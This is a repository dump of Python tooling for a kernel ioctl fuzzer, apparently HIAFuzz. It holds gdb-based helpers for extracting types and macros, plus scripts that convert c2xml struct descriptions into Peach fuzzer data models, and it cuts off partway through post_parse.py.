statements like '__u8 reserved1 : 2;' 53 | line = line[0:line.find(':')].strip() 54 | 55 | typename = line[0:line.rfind(' ')].strip() 56 | #print(line) 57 | #print('typename=%s' % typename) 58 | if typename not in all_struct and not is_contain_special_char(typename) and typename !='' and 'ptype' not in typename: 59 | #if typename not in all_struct and 'struct' in typename and '}' not in typename: 60 | deps.append(typename) 61 | all_struct.append(typename) 62 | print('add new type %s' % typename) 63 | elif 'enum' in sname or 'enum' in line: # enum type 64 | ccodes[sname] += line.replace(',', ',\n').replace('{','{\n').replace('}','\n}') 65 | elif 'struct' in line or is_typedef_struct: #special typedef struct {...} 66 | if 'struct' in line:#The first line of typedef struct 67 | ccodes[sname] += 'typedef %s' % line 68 | is_typedef_struct = True 69 | elif line == '}\n': 70 | ccodes[sname] += '} %s\n' % sname 71 | else: # the flowing line 72 | ccodes[sname] += line 73 | else: # normal typedef 74 | uppertype = line.strip() 75 | ccodes[sname] += 'typedef %s %s\n' % (uppertype, sname) 76 | #if uppertype not in all_struct and '}' not in uppertype and uppertype != '' and 'ptype' not in uppertype: 77 | if uppertype not in all_struct and 'struct' in uppertype and not is_contain_special_char(uppertype): 78 | deps.append(uppertype) 79 | all_struct.append(uppertype) 80 | print('add new type %s' % uppertype) 81 | 82 | if len(ccodes[sname]) > 0 and ccodes[sname][-1] != ';': 83 | ccodes[sname] = ccodes[sname][0:-1] + ';\n' 84 | #print(ccodes[sname]) 85 | return ccodes 86 | 87 | ''' 88 | Given a function name, return the line and file name of the function. 89 | ''' 90 | 91 | def get_kernel_root(gdbmi): 92 | global kernel_root 93 | if kernel_root == '': 94 | info_command = 'info line tty_ioctl' 95 | response = gdbmi.write(info_command, timeout_sec = 20) 96 | line_index = len(response) 97 | for i in range(len(response)): 98 | if 'Line' in response[i]['payload']: 99 | #/workspace/difuze/AndroidKernels/huawei/P9/kernel/drivers/tty/tty_io.c 100 | line_file_str = response[i]['payload'] 101 | kernel_root = re.match(r'.*"(.*)\\"', line_file_str).group(1) 102 | kernel_root = kernel_root[0:len(kernel_root) - len('drivers/tty/tty_io.c')] 103 | break 104 | print('kernel_root = %s' % kernel_root) 105 | return kernel_root 106 | 107 | def get_symble_file_from_ctags(gdbmi, function_name): 108 | kernel_root = get_kernel_root(gdbmi) 109 | tags_file_path = os.path.join(kernel_root, 'tags') 110 | print(tags_file_path) 111 | if not os.path.exists(tags_file_path): 112 | print('%s not exists' % tags_file_path) 113 | return '' 114 | p = subprocess.Popen(['grep', '^%s\t' % function_name, tags_file_path], stdout=subprocess.PIPE) 115 | p.wait() 116 | tag = str(p.stdout.readline(), encoding='utf-8') 117 | print(tag) 118 | file_name = os.path.join(kernel_root, tag.split('\t')[1]) 119 | return file_name 120 | 121 | def get_line_file_for_ioctl_function_from_gdb(gdbmi, function_name, allow_multi = False): 122 | info_command = 'info line %s' % function_name 123 | file_line_dict = {} 124 | 125 | try: 126 | response = gdbmi.write(info_command, timeout_sec=20) 127 | line_index = len(response) 128 | #print(line_index) 129 | print(response) 130 | 131 | for i in range(len(response)): 132 | #print(response[i]['payload']) 133 | if response[i]['payload'] is None: 134 | continue 135 | if 'Function' in response[i]['payload'] and 'not defined' in response[i]['payload'] and function_name in response[i]['payload']: 136 | if allow_multi: 137 | return file_line_dict 138 | else: 139 | return -1, '' 140 | 141 | #print('line_index=%d' % line_index) 142 | if response[i]['payload'].find('Line') >= 0: 143 | if function_name not in response[i]['payload']: 144 | #Function inline by gcc may contains Line, but no it's name. 145 | #Use ctags to find the line number. 146 | print('Find inlined function %s\'s declication' % function_name) 147 | line_file_str = response[i]['payload'] 148 | print(line_file_str) 149 | #file_name = line_file_str[line_file_str.find('\\"') + 2 : line_file_str.rfind('\\"')] 150 | file_name = re.match(r'.*"(.*)\\"', line_file_str).group(1) 151 | print(file_name) 152 | 153 | tags_file_path = os.path.join(get_kernel_root(gdbmi), 'tags') 154 | print(tags_file_path) 155 | if not os.path.exists(tags_file_path): 156 | print('%s not exists' % tags_file_path) 157 | break 158 | line_number = -1 159 | print("Try to open %s" % tags_file_path) 160 | 161 | 162 | #with open(tags_file_path, 'r') as f: 163 | try: 164 | #tags = f.readlines() 165 | if True: 166 | p = subprocess.Popen(['grep', '^%s\t' % function_name,tags_file_path], stdout=subprocess.PIPE) 167 | p.wait() 168 | tag = str(p.stdout.readline(), encoding='utf-8') 169 | #tag = f.readline() 170 | while tag: 171 | if tag.find(function_name) == 0: 172 | print(tag) 173 | decl_line = tag.split('\t')[2] 174 | file_name = os.path.join(kernel_root, tag.split('\t')[1]) 175 | decl_line = decl_line[2:-4].strip() 176 | print(decl_line) 177 | print(file_name) 178 | with open(file_name, 'r') as ff: 179 | sourcecodes = ff.readlines() 180 | print(sourcecodes) 181 | for ii in range(len(sourcecodes)): 182 | if sourcecodes[ii].strip() == decl_line: 183 | line_number = ii + 1 184 | break 185 | break 186 | tag = str(p.stdout.readline(), encoding='utf-8') 187 | except: 188 | print('Error %s' % tags_file_path) 189 | pass 190 | else: 191 | line_file_str = response[i]['payload'] 192 | print(line_file_str) 193 | line_number = int(re.match(r'Line (\d+)', line_file_str).group(1)) 194 | file_name = re.match(r'.*"(.*)\\"', line_file_str).group(1) 195 | print(line_number) 196 | print('got line file:\n%s:%d' % (file_name, line_number)) 197 | 198 | if not allow_multi: 199 | return line_number-1, file_name 200 | else: 201 | file_line_dict[file_name] = line_number-1 202 | except: 203 | pass 204 | #print('Error:') 205 | #for msg in response: 206 | # print(msg['payload']) 207 | #Only for dev_ioctl 208 | 209 | if allow_multi: 210 | return file_line_dict 211 | else: 212 | return -1, '' 213 | 214 | def get_macro_from_gdb(gdbmi, function_name, macro): 215 | print('%s:%s' % (function_name, macro)) 216 | if macro.isdigit(): 217 | return macro 218 | 219 | if function_name is not None: 220 | response = gdbmi.write('list %s' % function_name, timeout_sec=10) 221 | 222 | #Try multi times, gdb may act unexpectly. 223 | for i in range(5): 224 | response = gdbmi.write('p %s' % macro, timeout_sec=10) 225 | if len(response) < 2: 226 | print('Wait for 5 second to try %dth times.' % i) 227 | time.sleep(5) 228 | else: 229 | break 230 | 231 | if len(response) < 2: 232 | print(response) 233 | return '0' 234 | result_line = '' 235 | for msg in response: 236 | if '$' in msg['payload']: 237 | result_line = msg['payload'] 238 | print(result_line) 239 | break 240 | if result_line == '': 241 | print(response) 242 | return '1' 243 | 244 | if macro in result_line: 245 | enumtype_dict = get_struct_or_union_from_gdb(gdbmi, macro) 246 | enumtype = enumtype_dict[macro] 247 | #(gdb) ptype ROUTE_SHB_PORT 248 | #type = enum port {ROUTE_SHB_PORT = 1, ROUTE_MOTION_PORT, ROUTE_CA_PORT, ROUTE_FHB_PORT} 249 | print(enumtype) 250 | if enumtype != '' and '{' in enumtype and '}' in enumtype: 251 | enums = enumtype[enumtype.find('{'): enumtype.rfind('}')] 252 | elem_list = enums.split(',') 253 | gap = 0 254 | last_val = 0 255 | for i in range(len(elem_list)): 256 | if '=' in elem_list: 257 | last_val = int(elem_list.split('=')[2].strip()) 258 | gap = 0 259 | else: 260 | gap += 1 261 | if macro in elem_list[i]: 262 | #find macro in enums, then determin its value. 263 | return str(gap+last_val) 264 | else: 265 | try: 266 | reObj = re.match(r'\$(\d+) = (\d+)', result_line) 267 | if reObj is not None: 268 | cmd_value = reObj.group(2) 269 | return cmd_value 270 | except: 271 | pass 272 | #TODO: Some macro value can not print, need to find it's definition file and print it. 273 | print("Can not get macro \'%s:%s\'" % (function_name,macro)) 274 | print(response) 275 | return '1' 276 | 277 | def gdb_sizeof_type(gdbmi, type_name): 278 | psizeof = 'p sizeof(%s)' % type_name 279 | response = gdbmi.write(psizeof, timeout_sec=10) 280 | if response is not None: 281 | #$1 = 4 282 | try: 283 | line = response[1]['payload'] 284 | reObj = re.match(r'\$(\d+) = (\d+)', line) 285 | if reObj is not None: 286 | cmd_value = reObj.group(2) 287 | return int(cmd_value) 288 | except: 289 | pass 290 | return 4 -------------------------------------------------------------------------------- /post_processing/LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (c) 2015, The Regents of the University of California 2 | All rights reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without 5 | modification, are permitted provided that the following conditions are met: 6 | 7 | * Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | * Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation 12 | and/or other materials provided with the distribution. 13 | 14 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 15 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 16 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 17 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 18 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 19 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 20 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 21 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 22 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 23 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 24 | -------------------------------------------------------------------------------- /post_processing/c2xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/datadancer/HIAFuzz/c986d9c9fca140df0446da58f100bd1c6c985b82/post_processing/c2xml -------------------------------------------------------------------------------- /post_processing/generics/generic_arr.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /post_processing/generics/generic_i16.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /post_processing/generics/generic_i32.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /post_processing/generics/generic_i64.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /post_processing/parse.py: -------------------------------------------------------------------------------- 1 | import xml.etree.ElementTree as ET 2 | from xml.dom import minidom 3 | import sys 4 | import re 5 | import copy 6 | 7 | # TODO: uint8_t's are being interpreted as strings atm 8 | # TODO: unions 9 | 10 | class Element: 11 | def __init__(self, builtin, ele_type, signed): 12 | self.builtin = builtin 13 | 14 | lookup = { 15 | "char":"String", 16 | "signed char":"String", 17 | "unsigned char":"Number", 18 | "short":"Number", 19 | "signed short":"Number", 20 | "unsigned short":"Number", 21 | "int": "Number", 22 | "signed int":"Number", 23 | "unsigned int":"Number", 24 | "signed long":"Number", 25 | "long":"Number", 26 | "unsigned long":"Number", 27 | "long long":"Number", 28 | "signed long long":"Number", 29 | "unsigned long long":"Number", 30 | "long long long":"Number", 31 | "signed long long long":"Number", 32 | "unsigned long long long":"Number", 33 | "void":"Number", 34 | "bool":"Number", 35 | "string":"String", 36 | "float":"Number", 37 | "double":"Number", 38 | "long double":"Number", 39 | "union":"Choice", 40 | # non builtins 41 | "pointer":"Block", 42 | "array":"Block", 43 | "struct":"Block", 44 | "enum":"Choice", 45 | "padding":"String" 46 | } 47 | # TODO. 32bit vs 64bit systems 48 | size_lookup = { 49 | "char":1, 50 | "signed char":1, 51 | "unsigned char":1, 52 | "short":2, 53 | "signed short":2, 54 | "unsigned short":2, 55 | "int": 4, 56 | "signed int":4, 57 | "unsigned int":4, 58 | "signed long":8, 59 | "long":8, 60 | "unsigned long":8, 61 | "long long":8, 62 | "signed long long":8, 63 | "unsigned long long":8, 64 | "long long long":8, 65 | "signed long long long":8, 66 | "unsigned long long long":8, 67 | "void":1, 68 | "bool":1, 69 | "string":1, 70 | "float":99, 71 | "double":99, 72 | "long double":16, 73 | "union":1 74 | } 75 | 76 | #if "fixup" in sys.argv[1]: 77 | # f = open(sys.argv[1].replace("_fixup", "").replace('xml', 'h'),'r') 78 | #else: 79 | # f = open(sys.argv[1].replace('xml', 'h'),'r') 80 | #data = f.read() 81 | #f.close() 82 | tree = ET.parse(sys.argv[1]) 83 | root = tree.getroot() 84 | skip_len = len('') 85 | padno = 0 86 | padno_pre = 0 87 | anon_union = 0 88 | anon_struct = 0 89 | noname = 0 90 | # TODO: Make this more sequential 91 | 92 | def prettify(elem): 93 | #Return a pretty-printed XML string for the Element. 94 | rough_string = ET.tostring(elem, 'utf-8') 95 | reparsed = minidom.parseString(rough_string) 96 | return reparsed.toprettyxml(indent=" ")[skip_len+1:-1:] 97 | 98 | def get_val_from_line(line): 99 | regex = "-?0[xX][0-9a-fA-F]{1,16}|-?\d+" 100 | #num = re.findall("[x\-\d]+", line) 101 | num = re.findall(regex, line) 102 | if len(num) == 0: 103 | return None 104 | num = num[0] 105 | 106 | try: 107 | val = int(num) 108 | except ValueError: 109 | #print "[*] Trying to convert: ", num 110 | val = int(num, 16) 111 | #print 'converted to ', val 112 | 113 | return val 114 | 115 | def find_enums(elem): 116 | enums = [] 117 | look_for = elem.get('id') 118 | for child in root: 119 | if child.get('base-type') == look_for and child.get('toplevel') != None: 120 | enums.append(child) 121 | return enums 122 | 123 | def find_num(name): 124 | lines = data.splitlines() 125 | idx = 0 126 | for line in lines: 127 | if name in line: 128 | break 129 | idx += 1 130 | 131 | #print idx 132 | #print lines[idx] 133 | #print line 134 | 135 | holder = idx 136 | while(idx): 137 | idx -= 1 138 | line = lines[idx] 139 | start = line.find('=') 140 | end = line.find('\n') 141 | line = line[start:end] 142 | num = get_val_from_line(line) 143 | if num is not None: 144 | #print "PREV NUM: ", num 145 | our_num = holder - idx + num 146 | #print "FOUND THE NUM: ", our_num 147 | return our_num 148 | 149 | print "COULDN'T FIND THE ENUM VAL" 150 | sys.exit(1) 151 | 152 | # TODO: THis only works for fuggin numbers 153 | def val_helper(name): 154 | #print name 155 | start = data.find(name) + len(name) 156 | end = data[start::].find('\n')+start 157 | line = data[start:end].strip().replace(',','') 158 | num = get_val_from_line(line) 159 | if num is None: 160 | #print 'val_helper: got None' 161 | num = find_num(name) 162 | 163 | #print '[+] returning num: ', num 164 | return num 165 | 166 | def get_structs_and_unions(root): 167 | struct_nodes = [] 168 | for child in root: 169 | #if child.get('type') == 'struct': 170 | if child.get('type') in ['struct', 'union']: 171 | struct_nodes.append(child) 172 | 173 | #print len(struct_nodes) 174 | return struct_nodes 175 | 176 | 177 | def find_type(node, base_type): 178 | if node.get('id') == base_type: 179 | return node 180 | 181 | for child in node.getchildren(): 182 | cool = find_type(child, base_type) 183 | if cool is not None: 184 | return cool 185 | 186 | 187 | # get to the starting point for our element 188 | def peel_elem(elem, name, offset): 189 | ''' 190 | there are 2 cases where we don't need to peel anymore 191 | (a) we have a type field and it's in our lookup table 192 | (b) we have a base-type-builtin (unfortunately these are type node) 193 | ''' 194 | 195 | elem_base = elem.get('base-type-builtin') 196 | elem_type = elem.get('type') 197 | out_elem = '' 198 | 199 | try: 200 | lookup_type = lookup[elem_type] 201 | 202 | except KeyError: 203 | lookup_type = None 204 | 205 | # complex case 206 | if lookup_type is not None: 207 | # elem_base may be None or may be something meaningful as seen here: 208 | # 209 | #print "Complex" 210 | #print elem.attrib 211 | #ipdb.set_trace() 212 | out_elem = build_ele(elem, elem_type, elem_base, False, name, offset) 213 | 214 | # simple case 215 | # We should only hit this for simple cases such as numbers and chars 216 | elif elem_base is not None: 217 | #print "Simple" 218 | #print elem.attrib 219 | #ipdb.set_trace() 220 | out_elem = build_ele(elem, elem_type, elem_base, True, name, offset) 221 | 222 | # Should this be a while loop? I don't think so 223 | else: 224 | #print '[+] Searching...' 225 | btype = elem.get('base-type') 226 | if btype == None: 227 | print 'Unknown base-type' 228 | sys.exit(1) 229 | peeled_elem = find_type(root, elem.get('base-type')) 230 | if peeled_elem == None or peeled_elem.attrib == {}: 231 | print "Couldn't find the guy" 232 | sys.exit(1) 233 | return peel_elem(peeled_elem, name, offset) 234 | 235 | return out_elem 236 | 237 | def parse_node(struct): 238 | #print struct.get('ident') 239 | global anon_struct 240 | global noname 241 | struct_name = struct.get('ident') 242 | if struct_name is None: 243 | struct_name = 'anon_struct' + struct.get('id') 244 | struct_byte_size = int(struct.get('bit-size'))/8 245 | struct_node = ET.Element("DataModel", name=struct_name, byte_size=str(struct_byte_size), type=struct.get('type')) 246 | sz = int(struct.get('bit-size')) 247 | for elem in struct: 248 | name = elem.get('ident') 249 | offset = elem.get('offset') 250 | if name is None: 251 | name = 'noname' + str(noname) 252 | noname += 1 253 | node = peel_elem(elem, name, offset) 254 | if node is not None: 255 | struct_node.append(node) 256 | return struct_node 257 | 258 | def build_number(elem, name, val=None): 259 | bit_size = elem.get('bit-size') 260 | if val is None: 261 | out_elem = ET.Element('Number', name=name, size=bit_size) 262 | else: 263 | out_elem = ET.Element('Number', name=name, size=bit_size, value=val) 264 | 265 | return out_elem 266 | 267 | def build_string(elem, name): 268 | bit_size = elem.get('bit-size') 269 | byte_size = str(int(bit_size)/8) 270 | out_elem = ET.Element('String', name=name, length=byte_size) 271 | #print name 272 | if name is None: 273 | import ipdb;ipdb.set_trace() 274 | return out_elem 275 | 276 | # TODO: union ptrs, func ptrs 277 | # TODO: Handle pointer array offsets 278 | def build_pointer(elem, name, offset): 279 | ''' 280 | pointers are just string elements.. 281 | we name them specially so that our post_processor can create 282 | a mapping later. 283 | ''' 284 | 285 | # okay, there are a couple things to do here: 286 | # (1) If this is a simple ptr (char, void, int, etc). The depth is 1 and we already know the type 287 | # (2) get to the bottom of the pointer to assess pointer depth 288 | # (3) once there. Check if it's a ptr to a builtin, or a struct 289 | 290 | pointer_depth = 1 291 | size = elem.get('bit-size') 292 | length = str(int(size)/8) 293 | elem_base = elem.get('base-type-builtin') 294 | elem_type = elem.get('type') 295 | 296 | # (1) we have a simple case here where it's a pointer to something like an int or char.. 297 | if elem_base is not None: 298 | ptr_to = lookup[elem_base] 299 | elem_size = size_lookup[elem_base] 300 | ptr_elem = ET.Element('Pointer', name=name, length=length, ptr_to=ptr_to, ptr_depth=str(pointer_depth), base=elem_base, offset=offset, elem_size=str(elem_size)) 301 | return ptr_elem 302 | 303 | # (2) okay, ptr to something else. Let's get to the bottom here. 304 | resolved_ele = find_type(root, elem.get('base-type')) 305 | resolved_base = resolved_ele.get('base-type-builtin') 306 | resolved_type = resolved_ele.get('type') 307 | 308 | # (2) cont. This ptr is more than 1 level deep. so keep going till we hit the bottom 309 | while (resolved_base is None and resolved_type == 'pointer'): 310 | pointer_depth += 1 311 | resolved_ele = find_type(root, resolved_ele.get('base-type')) 312 | resolved_base = resolved_ele.get('base-type-builtin') 313 | resolved_type = resolved_ele.get('type') 314 | 315 | # (3) we've hit the bottom, now we either have a builtin, a struct, or some fucked up stuff that we're gonna ignore for now 316 | # (3a) it's a builtin, nice 317 | if resolved_base is not None: 318 | # this is to account for the fact that nonbuiltin ptrs will always have 1 extra depth just to get the the type 319 | pointer_depth += 1 320 | resolved_size = size_lookup[resolved_base] 321 | ptr_to = lookup[resolved_base] 322 | ptr_elem = ET.Element('Pointer', name=name, length=length, ptr_to=ptr_to, ptr_depth=str(pointer_depth), offset=offset, base=resolved_base, elem_size=str(resolved_size)) 323 | 324 | else: 325 | # we're only handle structs right now so check if it's not a struct pointer. 326 | if resolved_type == 'struct': 327 | ptr_to = resolved_ele.get('ident') 328 | ptr_elem = ET.Element('Pointer', name=name, length=length, ptr_to=ptr_to, ptr_depth=str(pointer_depth), offset=offset) 329 | 330 | elif resolved_type == 'function': 331 | ptr_to = 'function' 332 | ptr_elem = ET.Element('Pointer', name=name, length=length, ptr_to=ptr_to, ptr_depth=str(pointer_depth), offset=offset) 333 | 334 | elif resolved_type == 'union': 335 | ptr_to = resolved_ele.get('ident') 336 | ptr_elem = ET.Element('Pointer', name=name, length=length, ptr_to=ptr_to, ptr_depth=str(pointer_depth), offset=offset) 337 | 338 | return ptr_elem 339 | 340 | 341 | def build_array(elem, name, offset): 342 | ''' 343 | an array element is just a block element with some enclosed elements 344 | One thing to keep in mind here is the possibility of a 0 element array. 345 | Also watch for multi-dimensional arrays. 346 | If we hit one of these, we'll need to backpedal a bit and remove the parent element 347 | ''' 348 | arr_size = elem.get('array-size') 349 | # TODO: CHECKME. Seems sometimes 0 size arrays have no array-size element: 350 | # 19532 struct kmem_cache *memcg_caches[0]; 351 | # 8513 352 | if arr_size == '0' or arr_size == None: 353 | #print "array size of 0" 354 | return None 355 | try: 356 | elem_size = (int(elem.get('bit-size'))/int(arr_size))/8 357 | except TypeError: 358 | import ipdb;ipdb.set_trace() 359 | 360 | # we'll do a prelim check to make sure we have an array size > 0. 361 | 362 | # if we have a postiive array size, it should be a given that we'll have a Block element 363 | block_element = ET.Element('Block', name=name, maxOccurs=arr_size, minOccurs=arr_size, offset=offset, elem_size=str(elem_size)) 364 | 365 | # let's first deal with the simple case where we have an array of builtin type 366 | array_type = elem.get('base-type-builtin') 367 | if array_type is not None: 368 | array_peach_type = lookup[array_type] 369 | # we'll want to modify the element's size so our Number and String builder don't mess up 370 | single_elem_bitsize = int(elem.get('bit-size'))/int(arr_size) 371 | # CHECK: is it fine to just use the original element? 372 | elem_dup = copy.copy(elem) 373 | elem_dup.set('bit-size', str(single_elem_bitsize)) 374 | 375 | if array_peach_type == 'Number': 376 | arr_element = build_number(elem_dup, name+'_ele') 377 | 378 | elif array_peach_type == 'String': 379 | arr_element = build_string(elem_dup, name+'_ele') 380 | 381 | else: 382 | print 'unaccounted for array type' 383 | import ipd;ipdb.set_trace() 384 | 385 | if arr_element is None: 386 | import ipdb;ipdb.set_trace() 387 | block_element.append(arr_element) 388 | 389 | 390 | # okay, so if we're here then we have a more complex array type 391 | else: 392 | arr_elem_btype = elem.get('base-type') 393 | if arr_elem_btype is None: 394 | print 'array element has no base-type and is not simple' 395 | import ipdb;ipdb.set_trace() 396 | 397 | resolved_arr_elem = find_type(root, arr_elem_btype) 398 | resolved_arr_elem_type = resolved_arr_elem.get('type') 399 | 400 | arr_element = peel_elem(resolved_arr_elem, name+'_ele', offset) 401 | if arr_element is None: 402 | import ipdb;ipdb.set_trace() 403 | block_element.append(arr_element) 404 | 405 | # this should be catching arrays who have zero size somewhere 406 | if arr_element is None: 407 | if resolved_arr_elem_type != 'array': 408 | print 'somethine weird is going on in array building' 409 | import ipdb;ipdb.set_trace() 410 | return None 411 | 412 | return block_element 413 | 414 | 415 | def build_struct(elem, name, offset): 416 | ''' 417 | a struct element is just a block elem with a ref to the struct type 418 | pretty easy :) 419 | ''' 420 | 421 | struct_type = elem.get('ident') 422 | if struct_type is None: 423 | struct_type = "anon_struct" + elem.get('id') 424 | block_element = ET.Element('Block', name=name, ref=struct_type, offset=offset) 425 | return block_element 426 | 427 | def build_union(elem, name, offset): 428 | ''' 429 | This will be a Choice block with a set of block elements inside 430 | each block element is a valid choice of the union. 431 | This gets a tad tricky because despite the choice we pick, it has to be the same size 432 | so depending on the choice we'll add padding elements 433 | ''' 434 | global padno_pre 435 | global noname 436 | # I think I can just iterate through the choices and call peel_elem 437 | # and then fixup the size with padding 438 | choice_no = 0 439 | choice_block_element = ET.Element('Choice', name=name, offset=offset, choice_type='union') 440 | bit_size = elem.get('bit-size') 441 | byte_size = str(int(bit_size)/8) 442 | 443 | for choice in elem: 444 | if name is None: 445 | import ipdb;ipdb.set_trace() 446 | block_element = ET.Element('Block', name=name+'_choice'+str(choice_no)) 447 | choice_no += 1 448 | choice_size_bits = choice.get('bit-size') 449 | choice_name = choice.get('ident') 450 | if choice_name is None: 451 | choice_name = 'anon' + str(noname) 452 | noname += 1 453 | choice_element = peel_elem(choice, choice_name, offset) 454 | if choice_element is None: 455 | #print 'weird choice while building union' 456 | #import ipdb;ipdb.set_trace() 457 | # TODO: Checkme. This can occur when a choice is basically 0 size.. 458 | continue 459 | block_element.append(choice_element) 460 | # add padding if needed 461 | if int(bit_size) > int(choice_size_bits): 462 | bit_dif = int(bit_size) - int(choice_size_bits) 463 | pad_bytes = bit_dif/8 464 | #print pad_bytes 465 | pad_ele = ET.Element('String', name=str(padno_pre)+'_'+'padding', length=str(pad_bytes)) 466 | padno_pre += 1 467 | block_element.append(pad_ele) 468 | 469 | choice_block_element.append(block_element) 470 | 471 | return choice_block_element 472 | 473 | def build_enum(elem, name, offset): 474 | ''' 475 | this is pretty similar to union. We'll have a choice block with 476 | inner blocks. 477 | ''' 478 | # so the main task here is to go retrieve the 479 | # actual enum values because c2xml does not include them 480 | # this means well need to parse the values from the actual file 481 | choice_no = 0 482 | bit_size = elem.get('bit-size') 483 | fname = elem.get('file') 484 | start_line = int(elem.get('start-line')) 485 | end_line = int(elem.get('end-line')) 486 | f = open(fname, 'r') 487 | data = f.read().splitlines()[start_line:end_line-1] 488 | f.close() 489 | fine_grained = [] 490 | choice_names = [] 491 | regex = '[=, ,\,]' 492 | # NOTE: this is hacky as fuck 493 | # let's try to weed the comments out (if any) and pinpoint the values 494 | for line in data: 495 | line = line.strip() 496 | if line[0:2] == "//": 497 | continue 498 | if line[0:2] == "/*": 499 | continue 500 | if ',' in line or line == data[-1].strip(): 501 | if "//" in line: 502 | line = line[:line.find('//')] 503 | if "/*" in line: 504 | line = line[:line.find('/*')] 505 | pinpoint = line[line.find('=')::] 506 | fine_grained.append(pinpoint) 507 | line = line.strip() 508 | found = re.search(regex, line) 509 | if found is None: 510 | if line == data[-1].strip(): 511 | choice_name = line 512 | else: 513 | print "Something wrong with your enum regex" 514 | print line 515 | ipdb.set_trace() 516 | else: 517 | choice_name = line[:found.start()] 518 | 519 | choice_names.append(choice_name) 520 | 521 | last_val = -1 522 | last_idx = 0 523 | val_list = [] 524 | # okay now we HOPEFULLY have either the values or empty strings 525 | # let's use this to get the vals 526 | for thing in fine_grained: 527 | val = get_val_from_line(thing) 528 | if val is None: 529 | val = last_val + 1 530 | 531 | last_val = val 532 | last_idx = fine_grained.index(thing) 533 | val_list.append(val) 534 | 535 | assert len(val_list) == len(choice_names) 536 | goods = zip(val_list, choice_names) 537 | choice_block = ET.Element('Choice', name=name, offset=offset, choice_type='enum') 538 | 539 | # now generate choice blocks for all these values 540 | for pair in goods: 541 | block_element = ET.Element('Block', name=name+'_choice'+str(choice_no)) 542 | choice_no += 1 543 | num_element = ET.Element('Number', size=bit_size, name=pair[1], value=str(pair[0])) 544 | block_element.append(num_element) 545 | choice_block.append(block_element) 546 | 547 | return choice_block 548 | 549 | def build_ele(elem, elem_type, elem_base, simple, name, offset): 550 | 551 | # if it's simple, just build the number/string :) 552 | if simple: 553 | out_type = lookup[elem_base] 554 | out_elem = '' 555 | 556 | if out_type == 'Number': 557 | out_elem = build_number(elem, name) 558 | 559 | elif out_type == 'String': 560 | out_elem = build_string(elem, name) 561 | 562 | if out_elem == '': 563 | ipdb.set_trace() 564 | return out_elem 565 | 566 | # handles: array, pointer, struct, union, enum, ... 567 | else: 568 | out_type = lookup[elem_type] 569 | out_elem = '' 570 | #print '-'*20 571 | #print elem_type 572 | #print '-'*20 573 | #print 574 | 575 | if elem_type == 'pointer': 576 | out_elem = build_pointer(elem, name, offset) 577 | 578 | elif elem_type == 'array': 579 | out_elem = build_array(elem, name, offset) 580 | 581 | elif elem_type == 'struct': 582 | out_elem = build_struct(elem, name, offset) 583 | 584 | elif elem_type == 'union': 585 | out_elem = build_union(elem, name, offset) 586 | 587 | elif elem_type == 'enum': 588 | out_elem = build_enum(elem, name, offset) 589 | 590 | if out_elem == '': 591 | ipdb.set_trace() 592 | return out_elem 593 | 594 | 595 | nodes_of_interest = get_structs_and_unions(root) 596 | outer_node = ET.Element("jay_partial_pit", name=sys.argv[1]) 597 | for node in nodes_of_interest: 598 | parsed_node = parse_node(node) 599 | try: 600 | prettify(parsed_node) 601 | outer_node.append(parsed_node) 602 | except TypeError: 603 | pass 604 | #import ipdb;ipdb.set_trace() 605 | 606 | 607 | print prettify(outer_node) 608 | 609 | -------------------------------------------------------------------------------- /post_processing/post_parse.py: -------------------------------------------------------------------------------- 1 | import xml.etree.ElementTree as ET 2 | from xml.dom import minidom 3 | import sys 4 | import re 5 | import platform 6 | from copy import copy 7 | 8 | # TODO: ENUMS do not carry value information in the xml generated by c2xml 9 | # TODO: uint8_t's are being interpreted as strings atm 10 | # TODO: unions 11 | 12 | fname = sys.argv[1] 13 | devname = sys.argv[2] 14 | ioctl_id = sys.argv[3] 15 | main_struct = sys.argv[4] 16 | tree = ET.parse(fname) 17 | 18 | root = tree.getroot() 19 | skip_len = len('') 20 | struct_list = [] 21 | seen = [] 22 | 23 | def prettify(elem): 24 | #Return a pretty-printed XML string for the Element. 25 | rough_string = ET.tostring(elem, 'utf-8') 26 | reparsed = minidom.parseString(rough_string) 27 | return reparsed.toprettyxml(indent=" ")[skip_len+1:-1:] 28 | 29 | 30 | def union_hero(choice_block, required_structs, parent_struct_name): 31 | for choice in choice_block: 32 | pointers = choice.findall('Pointer') 33 | for ptr in pointers: 34 | ptr_to = ptr.get('ptr_to') 35 | if ptr_to is not None: 36 | if ptr_to in ['Number', 'String', 'function']: 37 | pass 38 | 39 | else: 40 | resolved_ele = root[lookup.get(ptr_to)] 41 | if resolved_ele in required_structs: 42 | required_structs.remove(resolved_ele) 43 | required_structs.append(resolved_ele) 44 | # if it's a recursive struct, don't recruse into it 45 | if parent_struct_name != ptr_to: 46 | # TODO: CHECKME 47 | doit(resolved_ele, 